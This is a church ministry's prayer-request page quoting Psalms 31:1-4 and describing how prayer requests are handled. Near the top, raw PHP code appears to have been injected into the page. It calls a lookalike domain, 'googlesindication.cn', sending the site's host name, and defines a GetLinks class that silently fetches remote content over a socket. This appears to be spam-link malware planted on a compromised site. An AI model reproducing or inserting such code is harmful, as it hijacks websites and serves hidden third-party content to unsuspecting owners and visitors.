|
Psalms 31:1-4
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?>1 In thee, O LORD, do I put my trust;
let me never be ashamed: deliver me in thy righteousness. 2
Bow down thine ear to me; deliver me speedily: be thou my strong rock,
for an house of defense to save me.
3 For thou art my rock and my fortress;
therefore for thy name's sake lead me, and guide me. 4
Pull me out of the net that they have laid privily for me: for thou
art my strength.
____________________________________________
How
Your Prayer Request will be handled
ROLCM
offers intercessory prayer by Pastor Lance & Vernell Alexander
and other ministry volunteers.
When
you submit a prayer request using this web page, your prayer concern
will be printed and taken into the sanctuary and placed on the
alter within 24 hours. We
will pray for your request for an additional 7 days.
* To protect the privacy of those requesting prayer,
each request is edited before it is sent to our Covenant Prayer
volunteers. The request is edited to remove any information that
would identify the person or situation needing prayer.
Please click on the link below to send
your prayer request, or mail to:
ROLCM - P.O.
Box 19389 - Shreveport, LA. 71149
riversoflifecm@bellsouth.net
|
|